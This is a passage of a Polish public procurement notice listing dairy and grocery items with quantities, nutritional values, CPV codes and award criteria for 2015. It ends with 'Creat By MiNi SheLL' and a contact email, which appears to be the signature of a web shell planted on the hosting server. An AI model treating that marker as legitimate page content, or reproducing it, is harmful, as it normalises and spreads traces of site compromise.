6.	Jogurt 115g , wartość energ. 122 kcal w 100g produktu, 2,6 g białka w 100g produktu	szt	300
7.	Jogurt do picia
owocowy 250g wartość energ w 100g 77 kcal zawartośc tłuszczu 1g białko 2,4g	szt	300
8.	Jogurt owocowy do picia 330g, wartość energ. 75 kcal w 100ml produktu, zawartość tłuszczu w 100ml produktu-1 g	szt	100
9.	Jogurt kremowy z dodatkiem owocowego musu 110g	Szt	100
10.	Jogurt owocowy 125g, wartość energ. w 100g-79 kcal, zawartość białka-1,8g w 100g produktu szt	200
11.	Jogurt owocowy 80g, wartość energ. w 100g produktu-107 kcal, zawartość białka w 100g produktu-6,3g 	szt	100
12.	Jogurt owocowy- 125g, wartość energetyczna w 100g produktu-95 kcal	szt	500
13.	Jogurt owocowy,
125g , wartość energ. w 100g produktu-91 kcal, zawartość tłuszczu w 100g produktu-1,1g	szt	300
14.	Kefir 400ml	szt	150
15.	Margaryna mleczna do pieczenia i duszenia, opakowanie 250g, zawartość tłuszczu min.  70%	szt	600
16.	Masło 200g,  zawartość tłuszczu min. 82%	szt	1000
17.	Mleko 3,2% 1l , warość energ. w 100ml-60 kcal	szt	450
18.	Napój mleczny owocowy 180g 	szt	300
19. 	Olej uniwersalny 1l	szt	300
20.	Ser biały krajanka 	kg	280
21.	Ser żółty krojony	kg	60
22.	Serek homogenio-wany 150g, wartość energetyczna w 100g produktu-
144 kcal 	szt	250
23.	Serek topiony 100g(zwykły lub smakowy)	szt	300
24.	Śmietana 12% ,500g , wartość energ. w 100 ml-134 kcal, 	szt	200
25.	Śmietana 30% 400ml	szt	10
26. 	Śmietana zakwaszana 400ml 18%	szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> POZOSTAŁE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Baton mleczny 21,5g, wartość energ. w 100g produktu-
 454 kcal	szt.	40	 	 	 		 
2.	Baton z płatków  zbożowych w polewie mlecznej 25g, 104,5 kcal	szt	10	 	 	 		 
3.	Batonik czekoladowy, 45g, wartość energ. w 100g 511 kcal	Szt	40	 	 	 		 
4.	Batonik z orzechowym nadzieniem- w  jednym opakowaniu 2 sztuki batoników 43g	op	40	 	 	 		 
5.	Bazylia 20g	szt	10	 	 	 		 
6.	Biszkopty okrągłe 200g	szt	40	 	 	 		 
7.	Biszkopty podłużne opak. 140g	szt	40	 	 	 		 
8.	Budyń z cukrem,60g wartość energ. po przyrządzeniu 85 kcal w 100g produktu, zawartość cukru w 100g-8,7g	szt	100	 	 	 		 
9.	Cukier	kg	900	 	 	 		 
10.	Cukier waniliowy 
10 g	szt	100	 	 	 		 
11.	Cynamon sypki 15 g 	szt	50	 	 	 		 
12.	Cytrynka 1l. 	szt	190	 	 	 		 
13.	Drożdże 100g	szt	10	 	 	 		 
14.	Galaretka 100 g , wartość energ. po przyrządzeniu-49 kcal w 100g, zawartość cukru w 100g-10,6g	szt	100	 	 	 		 
15.	Gałka muszkatowa 10 g	szt	10	 	 	 		 
16.	Groszek ptysiowy200g	Szt	5	 	 	 		 
17.	Herbata 100g	szt	500	 	 	 		 
18.	Herbatniki małe 50g	szt	150	 	 	 		 
19.	Herbatnikowe ciasteczka, o długości 110mm, zawartość karmelu 32%, zawartość czekolady 35%- 2 szt. w opak. 	op	100	 	 	 		 
20.	Kakao ciemne, bez cukru, 200g, o zawartości tłuszczu 10-12%	szt	15	 	 	 		 
21.	Kasza gryczana 1kg	kg	50	 	 	 		 
22.	Kasza jęczmienna 1 kg	kg	15	 	 	 		 
23.	Kasza manna 1kg	kg	10	 	 	 		 
24.	Kawa zbożowa drobno mielona 120g	szt	4	 	 	 		 
25.	Kawa zbożowa150 g  wartość energ w 100g 331kcal białko 4,3g	szt	10	 	 	 		 
26.	Ketchup łagodny,
500 g, wartość energ. w 100g- 94 kcal, zawartość koncentratu pomidor- 37%	szt	30	 	 	 		 
27.	Krem czekoladowo-orzechowy 630g, zawiera 13% orzechów laskowych, wartość energ. 544 kcal w 100g produktu	Szt	30	 	 	 		 
28.	Kruche ciastka maślane 190g	Szt	15	 	 	 		 
29.	Liść laurowy
 6 g	szt	20	 	 	 		 
30.	Majeranek 
10 g	szt	20	 	 	 		 
31.	Majonez dekoracyjny ,wartość energ. 739 kcal w 100g produktu, zawartość tłuszczu w 100g produktu- 80 g	l	60	 	 	 		 
32.	Makaron domowy,250g zawartość jaj- 23,8%	szt	45	 	 	 		 
33.	Makaron łazanki, 500 g wartość energ. w 100g produktu- 375 kcal, zawartość tłuszczu- 1,7g w 100g produktu	kg	40	 	 	 		 
34.	Makaron świderki 500 g wartość energ. w 100g produktu- 375 kcal, zawartość tłuszczu- 1,7g w 100g produktu	kg	180	 	 	 		 
35.	Makaron zacierka 
250 g	szt	150	 	 	 		 
36.	Mąka pszenna 1 kg	kg	300	 	 	 		 
37.	Mąka ziemniaczana Superior 1 kg	kg	190	 	 	 		 
38.	Miód 300g	Szt	5	 	 	 		 
39.	Mleczna kanapka, wartość energ. 420 kcal w 100g, zawartość mleka pasteryzowanego- 40%	Szt	100	 	 	 		 
40.	Musli 350g 70% płatków zbożowy, 30% owoców	szt	4	 	 	 		 
41.	Musztarda delikatesowa 1l wartość energ w 100g 113 kcal	szt	3	 	 	 		 
42.	Napój dla dzieci 300 ml, nie zawiera sztucznych barwników i konserwantów opakowanie plastikowe	szt	300	 	 	 		 
43.	Ocet 10% 0,5 l	szt	40	 	 	 		 
44.	Papryka słodka 20g	szt	150	 	 	 		 
45.	Pieprz 20 g	szt	140	 	 	 		 
46.	Płatki śniadaniowe czekoladowe 500g, kakao-8,6%, 37 g cukru w 100g produktu, wartość energ. 382 kcal w 100g produktu	szt	40	 	 	 		 
47.	Przyprawa do zup i sosów typu Maga lub równoważny  850ml	szt	60	 	 	 		 
48.	Przyprawa uniwersalna do potraw 200g, zawartość warzyw suszonych 15,2% , 	szt	300	 	 	 		 
49.	Rogal z nadzieniem , 65 g	szt	60	 	 	 		 
50.	Ryż sypki długoziarnisty 1 kg	kg	200					
51.	Sezamki różne smaki 27g							
52.	Soczek owocowy dla dzieci, karton 
200 ml ,bez dodatku cukru	szt	200					
53.	Sól spożywcza jodowana 1kg	kg	100					
54.	Wafel czekoladowy 36 g wartość energ. W 100g 525g	szt 50					
55.	Wafel mleczno orzechowy 25g, 548 ckal	szt	10					
56.	Wafel nadziewany w polewie czekoladowej, 51 g
wartość energ w 100g 509 kcal	szt	50					
57.	Wafel w polewie czekoladowej, wartość energ. w 100g produktu-534 kcal, zawartość węglowodanów w 100g produktu-57,5 g	szt 50					
58.	Wafelek śmietankowy bez polewy 20g	szt	40					
59. 	Wafelek z mlecznym i karmelowym nadzieniem pokryty czekoladą i orzechami 35g wartość energ. 747 180 kJ kcal	szt 	10					
60.	Wafelek z orzechowym nadzieniem o zawartości mlecznej czekolady 49,5%waga 18,2g	Szt	30					
61. 	Wafle ryżowe 60g							
62.	Wafle suche ANDRUT 80g	szt 	4	 	 	 		 
63.	Wafle zbożowo ryżowe 60g	szt	4	 	 	 		 
64.	Ziele angielskie  15 g	szt	40	 	 	 		 
65. 	Zioła prowansalskie 20 g	szt	20	 	 	 		 
66.	Żurek kiszony  opak. kubek 0,5l	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com